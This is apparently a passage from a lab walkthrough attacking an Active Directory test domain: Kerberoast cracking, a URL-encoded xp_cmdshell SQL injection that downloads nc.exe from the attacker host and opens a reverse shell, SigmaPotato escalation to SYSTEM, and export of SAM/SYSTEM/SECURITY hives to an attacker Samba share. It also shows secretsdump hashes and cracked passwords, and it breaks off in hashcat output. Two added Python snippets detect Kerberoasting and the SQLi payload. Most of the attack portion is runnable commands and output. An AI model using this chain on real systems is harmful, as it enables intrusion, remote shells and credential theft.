Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344390
* Bytes.....: 139921596
* Keyspace..: 14344390

$krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*$e5bc8efac93e25d95774768cc0205fad$d5a45703e272ace010bc318ee6105be728adf86b2245ef21020172a8d254f226921a6df938e9ed3592c148408f27e7f806874494922c26399e14abe060b1678203992bc67abfab5186bd639256bcd703b233abab8f43a90df20a0a965c497f10a51e0ea5d3e0617d79b83e3347f9d53aca56cee8f260bae936d8df9302b51be5e82d0385504cd025f213b2befd54d805e73559ca27cc7eb405845fcb911f9efec8c09a1d72663e5385e09f4bc5af67efcf568aff5580f71660ac3cfe4ee0fd8381777c83900838a8dbf48ca649302aae3098f5349859bf4c6e7b12eaf78824d5fa7620a9bedb3d4eccd8b9e152c18b123c38fae001669dfb7f7face1e782e3e2c19d4e750f37584598f803aec470954d691d5e02664812a9ec3b1613d830a49fff5786eb9ca4109cf1e63832f1d846d359a31f3771a7672e8703da296414ccbc84dcfb2b57ce8e062554dbb5c657137c10faabbe57db1ef944f4cd5b00bb7fcdf5925b4e5e4812268121cdcd2cd53da578bec0eb1e82e1bc2e25b08542f086f937d20778942942d6f54964c759a38b675a8d2b50aa36c4d3b976c005452e536d4c67fc6f4aa79ac138b477de7361e6c3b974f1ed5a31a9e4409ee3157d667d9e0286f17e40efdff4be7d31c98f43e1315d24bdb31e5c1d9fa5f5638e94b52a4c76d0dce5f3fdf9cc0a893605e0f8adf1c774ade0060c4a10e60db2a0ab0587e898b9026d01dfeb2e23e7e4679d38f0dfd97abed82ed1f6ec413266b58cf58026dddeec224a38f8de9ea0ce1505ea75808958e4748a7591b1845e860b832ec56677c76242296e0dc943061f28ffab30ed8fe231ce19cee188c65b48d7b59dc379878984443c1c663f3297601deaea805889e8a6c084ca4755139693a7ffca8dedb881380df6da5e770362dcefca16d993b9e049cbb38dbdb9ab34621d15616c0f3cd1d76f7b2bcdb4b23749428c73aa15713ed24fb38c3f8fd1c22101f154c5e799fafbf840ab09ff81502b2184c6a63be186ba63fe439cefbab09d3c3f961c8c59d4f0c164c3ac57045d7e1f03e54088b4501588e6c1716874351d931ac5f901932c4f0c979db8fa775df36c977633b5f4a5b77737ef2909ee10ea47aef6f2c9f804fec09e572ce4644a6ff52ef1542d4f87a29243937ef6da241237e79b4ae3ec4fc017999eb112b5c498385d001533bf4fc8db8163d9ad7bed7aa67d1da9a6b860432442a982ea16afa48ae67ff7567bffded92bd9d0be843b8dbaae1b4cd3f7ccc78becc030139e27ccf94f7b97161a727cc8a5db6487621d9decd91ab02b907cefbfedafcd301010db626e4c6913ae1915b81b49dceda9fc22de4c3
f8c9c389a4ff3e4c07b26ca7e3ba64d3e01cc1119a911ed6e66d66de0f522:daisy_3

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*iis_service$AD.LAB$ad.lab/iis_service*...e0f522
Time.Started.....: Fri Feb  7 00:33:50 2025 (0 secs)
Time.Estimated...: Fri Feb  7 00:33:50 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1977.2 kH/s (0.59ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 978944/14344390 (6.82%)
Rejected.........: 0/978944 (0.00%)
Restore.Point....: 976896/14344390 (6.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: dak123 -> curameng
Hardware.Mon.#1..: Util: 57%

Started: Fri Feb  7 00:33:49 2025
Stopped: Fri Feb  7 00:33:52 2025
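Steps 14 and 23 each leave a specific event on the domain controller, and the following added example (not code from the write-up) shows the two detections a DC owner would run over them: a 4768 with Pre-Authentication Type 0 and RC4 (etype 0x17), which is what yields a $krb5asrep$23$ hash, and a 4769 RC4 service ticket for a non-machine account, which is what yields a $krb5tgs$23$ hash. It also checks the userAccountControl bit that GetNPUsers reports as UF_DONT_REQUIRE_PREAUTH. The sample events are constructed to follow the 4768/4769 EventData field names; the values are made up.

```python
#!/usr/bin/env python3
"""Flag AS-REP roasting and Kerberoasting from DC Security events (added example)."""
from collections import Counter

UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit (4194304)
RC4_HMAC = "0x17"                   # Kerberos etype 23, the type hashcat 18200/13100 crack

# Constructed events modelled on this lab; field names follow the EventData of
# 4768 (TGT request) and 4769 (service-ticket request), values are invented.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "Ernesto", "IpAddress": "::ffff:10.10.14.10",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "aaron", "IpAddress": "::ffff:10.10.14.10",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "aaron@AD.LAB", "ServiceName": "iis_service",
     "IpAddress": "::ffff:10.10.14.10", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "aaron@AD.LAB", "ServiceName": "DC01$",
     "IpAddress": "::ffff:10.10.14.10", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "aaron@AD.LAB", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.10.14.10", "TicketEncryptionType": "0x17", "Status": "0x0"},
]


def dont_require_preauth(user_account_control: int) -> bool:
    """True when the account carries the flag that makes it AS-REP roastable."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


def is_asrep_roast(event) -> bool:
    """4768 issued without pre-authentication and with an RC4 ticket."""
    return (event.get("EventID") == 4768
            and event.get("Status") == "0x0"
            and event.get("PreAuthType") == "0"
            and event.get("TicketEncryptionType", "").lower() == RC4_HMAC)


def is_kerberoast(event) -> bool:
    """4769 RC4 service ticket for a user account with an SPN."""
    service = event.get("ServiceName", "")
    return (event.get("EventID") == 4769
            and event.get("Status") == "0x0"
            and event.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not service.endswith("$")        # machine accounts: long random passwords
            and service.lower() != "krbtgt")     # TGT renewals are not a crackable target


def detect(events):
    """Return (rule, requesting account, source ip, detail) for each matching event."""
    findings = []
    for ev in events:
        src = ev.get("IpAddress", "").replace("::ffff:", "")
        if is_asrep_roast(ev):
            findings.append(("asrep_roast", ev["TargetUserName"], src,
                             "4768 without pre-authentication, RC4 ticket"))
        elif is_kerberoast(ev):
            findings.append(("kerberoast", ev["TargetUserName"], src,
                             f"4769 RC4 service ticket for {ev['ServiceName']}"))
    return findings


def rc4_tgs_count_by_requester(events):
    """RC4 service tickets per requesting account; a burst from one account is the usual signature."""
    return Counter(ev["TargetUserName"] for ev in events if is_kerberoast(ev))


if __name__ == "__main__":
    for rule, account, src, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:12} {account:16} from {src:14} {detail}")
    print(dict(rc4_tgs_count_by_requester(SAMPLE_EVENTS)))
```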

WEB02 Attacks

1. Purged Aaron’s Cached Kerberos Ticket

┌──(kali㉿kali)-[~]
└─$ kdestroy 

2. Used the iis_service cracked password to request a Kerberos Ticket Granting Ticket (TGT)

┌──(kali㉿kali)-[~]
└─$ kinit iis_service
Password for iis_service@AD.LAB: daisy_3

3. Verified the Kerberos Ticket was Cached

┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:iis_service.ccache
Default principal: iis_service@AD.LAB

Valid starting       Expires              Service principal
02/07/2025 02:25:53  02/07/2025 12:25:53  krbtgt/AD.LAB@AD.LAB
        renew until 02/08/2025 02:25:50

4. Retrieved the Login Page Using Kerberos Negotiate Authentication

┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : http://web02.ad.lab/login.asp
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.40
*   Trying 10.10.14.40:80...
* Connected to web02.ad.lab (10.10.14.40) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
* GET /login.asp HTTP/1.1
* Host: web02.ad.lab
* Authorization: Negotiate [Kerberos token omitted]
* User-Agent: curl/8.11.1
* Accept: */* 
* Request completely sent off
* HTTP/1.1 200 OK
* Cache-Control: private
* Content-Type: text/html
* Server: Microsoft-IIS/10.0
* Set-Cookie: ASPSESSIONIDCQBCQSRT=IEKFKHNCNLEDPDGGFEBBFGGC; path=/
* WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvAZQ3tNCcC0VI0DR3PpK0yC84in2gSEVE8zQuK2/4s4AoF25Ju0CjMnd2je2rGOFKcVuUv5i6XMDsbN+mQI8avdCRswCFLY4crErWyBjiwCQNaqyCTc9aPqEUcZyvNIUXhYJE2SbgH+kYMOhempJx
* Negotiate: noauthpersist -> 0, header part: true
* Persistent-Auth: true
* Date: Fri, 07 Feb 2025 07:20:11 GMT
* Content-Length: 346

<html>
<head>
  <title>Very Insecure Login Form</title>
</head>
<body>
  Very Insecure Login Form
  <form method=POST action=login.asp>
    Username: <input type="text" name="username"><br/>
    Password: <input type="password" name="password"><br/>
    <input type=submit value=Login>
  </form>
</body>
</html>
* Connection #0 to host web02.ad.lab left intact

5. Attempted a Normal Login to the Webpage via POST

┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : -X POST -d "username=yourUsername&password=yourPassword" http://web02.ad.lab/login.asp
Note: Unnecessary use of -X or --request, POST is already inferred.
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.40
*   Trying 10.10.14.40:80...
* Connected to web02.ad.lab (10.10.14.40) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
* POST /login.asp HTTP/1.1
* Host: web02.ad.lab
* Authorization: Negotiate [Kerberos token omitted]
* User-Agent: curl/8.11.1
* Accept: */*
* Content-Length: 44
* Content-Type: application/x-www-form-urlencoded 
* upload completely sent off: 44 bytes
* HTTP/1.1 200 OK
* Cache-Control: private
* Content-Type: text/html
* Server: Microsoft-IIS/10.0
* Set-Cookie: ASPSESSIONIDCQBCQSRT=JEKFKHNCPFFODGCCEJINLKHK; path=/
* WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvesiYkl5bVECbTI4/U8F8QbdPPv7s3TtAK4up+QCpLUPc8Ws5EUs4sM3M6yDC7wLYIW+zhrL9ZXGjbh2YXuplDoH+rs9ZWV/i1qSXAnF6hAJRTTyILvgC1LiaKxXkWEa2qkKOrONQrugU3J+rmI9k
* Negotiate: noauthpersist -> 0, header part: true
* Persistent-Auth: true
* Date: Fri, 07 Feb 2025 07:31:47 GMT
* Content-Length: 368

Login failed.

<html>
<head>
  <title>Very Insecure Login Form</title>
</head>
<body>
  Very Insecure Login Form
  <form method=POST action=login.asp>
    Username: <input type="text" name="username"><br/>
    Password: <input type="password" name="password"><br/>
    <input type=submit value=Login>
  </form>
</body>
</html>
* Connection #0 to host web02.ad.lab left intact

6. Attempted to Login with Malformed Username Input (testing SQL injection syntax)

┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : -X POST -d "username='yourUsername&password=yourPassword" http://web02.ad.lab/login.asp
Note: Unnecessary use of -X or --request, POST is already inferred.
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.20
*   Trying 10.10.14.20:80...
* Connected to web02.ad.lab (10.10.14.20) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
* POST /login.asp HTTP/1.1
* Host: web02.ad.lab
* Authorization: Negotiate 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
* User-Agent: curl/8.11.1
* Accept: */*
* Content-Length: 44
* Content-Type: application/x-www-form-urlencoded
 
* upload completely sent off: 44 bytes
* HTTP/1.1 200 OK
* Server: BaseHTTP/0.6 Python/3.13.1
* Date: Mon, 13 Jan 2025 23:39:48 GMT
* Content-Type: text/html
* Set-Cookie: ASPSESSIONIDAACBCTAB=ONNNCBNCBMDDIBGNDAJLDLLP; path=/
* Content-Length: 59
* Connection: close

* shutting down connection #0
Query Error: Incorrect syntax near 'yourUsername'.

7. Create a Script to Generate an Encoded SQLi Injection

┌──(kali㉿kali)-[~]
└─$ vim url-encode-sqli.py
#!/usr/bin/env python3
import urllib.parse
import re

# The original unencoded payload (after "username=")
payload = (
    "';EXEC sp_configure 'show advanced options',1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;"
    "EXEC xp_cmdshell \"certutil -urlcache -f http://10.10.14.10:8000/nc.exe c:/users/public/nc.exe\";"
    "EXEC xp_cmdshell \"c:/users/public/nc.exe 10.10.14.10 80 -e cmd.exe\";--"
)

# Step 1: URL-encode everything (except '/' remains unencoded).
# We do not add ':' to the safe characters, so colons will be encoded by default.
encoded_payload = urllib.parse.quote(payload, safe="/")

# At this point, both colons (in "http:" and in "10.10.14.10:8000", as well as "c:" occurrences)
# have been encoded. The expected output should encode the colon after "http" but leave the colon
# between the IP address and port unencoded.
#
# We use a regex to find an IP address pattern followed by an encoded colon (%3A) and a port,
# then replace that encoded colon with a literal colon.
encoded_payload = re.sub(r'(\d+(?:\.\d+){3})%3A(\d+)', r'\1:\2', encoded_payload)

# Prepend the constant part.
final_output = "username=" + encoded_payload

print(final_output)

8. Ran the Script to Generate the Encoded SQLi Payload

┌──(kali㉿kali)-[~]
└─$ python3 url-encode-sqli.py
username=%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C1%3BRECONFIGURE%3BEXEC%20sp_configure%20%27xp_cmdshell%27%2C1%3BRECONFIGURE%3BEXEC%20xp_cmdshell%20%22certutil%20-urlcache%20-f%20http%3A//10.10.14.10:8000/nc.exe%20c%3A/users/public/nc.exe%22%3BEXEC%20xp_cmdshell%20%22c%3A/users/public/nc.exe%2010.10.14.10%2080%20-e%20cmd.exe%22%3B--
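
The output above is the payload as the wire sees it; only after URL decoding does `%27%3BEXEC` read as `';EXEC`, so a detection that matches on the raw encoded bytes is easy to sidestep with a different encoding choice. The logic below is an added example, not part of the lab or of any product: it decodes an `application/x-www-form-urlencoded` body the way the server does and flags MSSQL stacked-query indicators in the decoded field values. The three sample bodies are the request bodies from steps 5, 6 and 8. IIS W3C logs do not record POST bodies by default, so a check like this belongs in a WAF, a reverse proxy or application-level request logging rather than in after-the-fact log review.

```python
import re
import urllib.parse

# Indicators of MSSQL stacked-query abuse, evaluated on the *decoded* field value.
INDICATORS = {
    "quote_breakout": re.compile(r"^'"),
    "stacked_exec": re.compile(r";\s*EXEC\b", re.IGNORECASE),
    "sp_configure": re.compile(r"\bsp_configure\b", re.IGNORECASE),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.IGNORECASE),
    "comment_terminator": re.compile(r"--\s*$"),
}

# Constructed copies of the bodies sent in steps 5, 6 and 8 of this page.
SAMPLE_BODIES = {
    "normal_login": "username=yourUsername&password=yourPassword",
    "quote_probe": "username='yourUsername&password=yourPassword",
    "stacked_payload": (
        "username=%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C1%3BRECONFIGURE"
        "%3BEXEC%20sp_configure%20%27xp_cmdshell%27%2C1%3BRECONFIGURE%3BEXEC%20xp_cmdshell%20"
        "%22certutil%20-urlcache%20-f%20http%3A//10.10.14.10:8000/nc.exe%20c%3A/users/public/nc.exe%22"
        "%3BEXEC%20xp_cmdshell%20%22c%3A/users/public/nc.exe%2010.10.14.10%2080%20-e%20cmd.exe%22%3B--"
    ),
}


def decode_form_body(body):
    """Decode a form body into {field: first value}, exactly as the server would."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def inspect_body(body):
    """Return {field: [indicator names]} for each field that trips at least one indicator."""
    findings = {}
    for field, value in decode_form_body(body).items():
        hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
        if hits:
            findings[field] = hits
    return findings


def run_demo():
    """Inspect every sample body; an empty dict means nothing fired."""
    return {name: inspect_body(body) for name, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for name, findings in run_demo().items():
        print(f"{name}: {findings or 'clean'}")
```

The step 6 probe trips only `quote_breakout`, which is the right sensitivity for an alert on a login endpoint: a lone quote is what a tester sends first, and it is also what the server's own error message leaked. The step 8 body trips all five indicators at once, which is the signature of a stacked `xp_cmdshell` chain rather than a stray apostrophe in a surname.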

9. Saved the SQL Injection Payload to a File

┌──(kali㉿kali)-[~]
└─$ echo "username=%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C1%3BRECONFIGURE%3BEXEC%20sp_configure%20%27xp_cmdshell%27%2C1%3BRECONFIGURE%3BEXEC%20xp_cmdshell%20%22certutil%20-urlcache%20-f%20http%3A//10.10.14.10:8000/nc.exe%20c%3A/users/public/nc.exe%22%3BEXEC%20xp_cmdshell%20%22c%3A/users/public/nc.exe%2010.10.14.10%2080%20-e%20cmd.exe%22%3B--" > payload.txt

10. Copied nc.exe to the current working directory

┌──(kali㉿kali)-[~]
└─$ find / -name nc.exe -type f 2>/dev/null
/usr/share/windows-resources/binaries/nc.exe

┌──(kali㉿kali)-[~]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .

11. Confirmed the Python3 HTTP Server is still Running

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

12. Sent the SQLi Payload via HTTP POST to Trigger a Reverse Shell

┌──(kali㉿kali)-[~]
└─$ curl -v --negotiate -u : --data-binary @payload.txt http://web02.ad.lab/login.asp
* Host web02.ad.lab:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.14.40
*   Trying 10.10.14.40:80...
* Connected to web02.ad.lab (10.10.14.40) port 80
* using HTTP/1.x
* Server auth using Negotiate with user ''
> POST /login.asp HTTP/1.1
> Host: web02.ad.lab
> Authorization: Negotiate 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
> User-Agent: curl/8.11.1
> Accept: */*
> Content-Length: 357
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 357 bytes

13. Spawned a Reverse Shell on WEB02 as nt service\mssqlserver

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.40] 49882
Microsoft Windows [Version 10.0.26100.3037]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32> whoami
nt service\mssqlserver

14. Listed Group Memberships and Privileges

C:\Windows\System32> whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users    Alias            S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT SERVICE\ALL SERVICES              Well-known group S-1-5-80-0   Mandatory group, Enabled by default, Enabled group


C:\Windows\System32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

15. Abused SeImpersonatePrivilege to Elevate Privileges to SYSTEM and used NC to Spawn an Interactive Shell

┌──(kali㉿kali)-[~]
└─$ wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
--2024-10-23 22:25:11--  https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
Resolving github.com (github.com)... 140.82.112.3
Connecting to github.com (github.com)|140.82.112.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/689169533/c2dab604-b778-49ae-9142-ea2e38b12908?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T022513Z&X-Amz-Expires=300&X-Amz-Signature=6ee7952c67be58f0adee183ac704344fbb9c46bd11783f13d134fc2c67e3f866&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSigmaPotato.exe&response-content-type=application%2Foctet-stream [following]
--2024-10-23 22:25:12--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/689169533/c2dab604-b778-49ae-9142-ea2e38b12908?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241024%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241024T022513Z&X-Amz-Expires=300&X-Amz-Signature=6ee7952c67be58f0adee183ac704344fbb9c46bd11783f13d134fc2c67e3f866&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSigmaPotato.exe&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63488 (62K) [application/octet-stream]
Saving to: ‘SigmaPotato.exe’
SigmaPotato.exe                                                                100%[====================================================================================================================================================================================================>]
0K  --.-KB/s    in 0.004s
2024-10-23 22:25:12 (14.4 MB/s) - ‘SigmaPotato.exe’ saved [63488/63488]


Elevated Reverse Shell:
C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32> wget http://10.10.14.10:8000/nc.exe -O C:\Users\Public\new-nc.exe; wget http://10.10.14.10:8000/SigmaPotato.exe -O C:\Users\Public\SigmaPotato.exe; C:\Users\Public\SigmaPotato.exe "cmd /c C:\Users\Public\new-nc.exe 10.10.14.10 4445 -e cmd.exe"

[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 268 | Token: 0x708 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 1068
[+] Current Command Length: 61 characters
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 5212

16. Spawned a Reverse Shell on WEB02 as SYSTEM

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4445
listening on [any] 4445 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.40] 49914
Microsoft Windows [Version 10.0.26100.3037]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
whoami
nt authority\system

17. Started a Samba Share in Kali

┌──(kali㉿kali)-[~]
└─$ sudo rm -f /etc/samba/smb.conf

┌──(kali㉿kali)-[~]
└─$ sudo vim /etc/samba/smb.conf
[samba]
    path = /home/kali/samba
    browsable = yes
    writable = yes
    guest ok = yes
    read only = no
    create mask = 0664
    directory mask = 0775

┌──(kali㉿kali)-[~]
└─$ mkdir samba

┌──(kali㉿kali)-[~]
└─$ sudo smbpasswd -a kali
[sudo] password for kali:
New SMB password:
Retype new SMB password:
Added user kali.

┌──(kali㉿kali)-[~]
└─$ sudo systemctl start smbd        
[sudo] password for kali:

18. Authenticated to the Samba Share from the WEB02 SYSTEM shell

C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements!

PS C:\Windows\System32> net use \\10.10.14.10\samba /user:kali kali
net use \\10.10.14.10\samba /user:kali kali
The command completed successfully.

19. Saved Windows Registry Hives (SAM, SYSTEM, SECURITY) to the Samba Share

PS C:\Windows\System32> reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
The operation completed successfully.
The operation completed successfully.
The operation completed successfully.

20. Confirmed the WEB02 Registry Hives were Successfully Transferred to the Samba Share

┌──(kali㉿kali)-[~]
└─$ ls samba
sam.save  security.save  system.save

21. Dumped WEB02 Hashes with impacket-secretsdump

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -sam ~/samba/sam.save -system ~/samba/system.save -security ~/samba/security.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xa5d7d3b4e79ba4336ba75a06121544f8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:75ba7dbbc6abcbd00b6ee7fd08e923a5:::
Betty:1001:aad3b435b51404eeaad3b435b51404ee:fbb4a76ec8ed39439e66fac2e49e5e70:::
[*] Dumping cached domain logon information (domain/username:hash)
AD.LAB/iis_service:$DCC2$10240#iis_service#7e052580f2934707e2689854bc3f0371: (2025-02-07 07:41:34)
AD.LAB/Administrator:$DCC2$10240#Administrator#a01d80260b293cd51b7518b02a74adb3: (2025-02-07 05:49:58)
AD.LAB/Betty:$DCC2$10240#Betty#5fc7ac829477877edf8a44a2f205b383: (2025-02-07 07:55:46)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:3300220023003300460032002000680048002a006a006c004c006700680068004f0025002700480062002700640079006c00590066003300300058002e002d00280054003c005d003f00680061002b0022003e0026004000330077003c0026005f0058006f00410044007500600072004a00220035004c007400300078003800250048003b002600500063004c006c005a003f005e0062005a003c006e002f00460029004a0056006000460057004c0027006600490038003400380027006a006700620066006c0046004e00570020003c0056005f00290078005b002000580023003200260076006900200036004700
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9a2566114b94183102331d4b2b183008
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0cd004d809036faabdf9f6a094900b99bbb4e3ae
dpapi_userkey:0xf109b4f8878c5676d1899dd730be657cbc45e582
[*] NL$KM 
 0000   4D 62 7F C0 49 8B 28 E3  0C 7E 01 85 DF B6 49 37   Mb..I.(..~....I7
 0010   B6 14 2C 7B 2E 40 7E 55  E9 24 B7 44 85 44 40 13   ..,{.@~U.$.D.D@.
 0020   29 C4 35 5A 26 63 5B FF  A9 AE 0A 23 D8 6C CC A0   ).5Z&c[....#.l..
 0030   90 B7 7B 44 9B 9B 1C B1  8B A6 7D 41 02 AE 18 90   ..{D......}A....
NL$KM:4d627fc0498b28e30c7e0185dfb64937b6142c7b2e407e55e924b7448544401329c4355a26635bffa9ae0a23d86ccca090b77b449b9b1cb18ba67d4102ae1890
[*] Cleaning up...

22. Cracked Betty's Cached Domain Credential Hash with Hashcat, revealing the password "pinky.1995"

┌──(kali㉿kali)-[~]
└─$ hashcat -m 2100 -a 0 '$DCC2$10240#Betty#5fc7ac829477877edf8a44a2f205b383' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i9-14900KF, 2865/5795 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

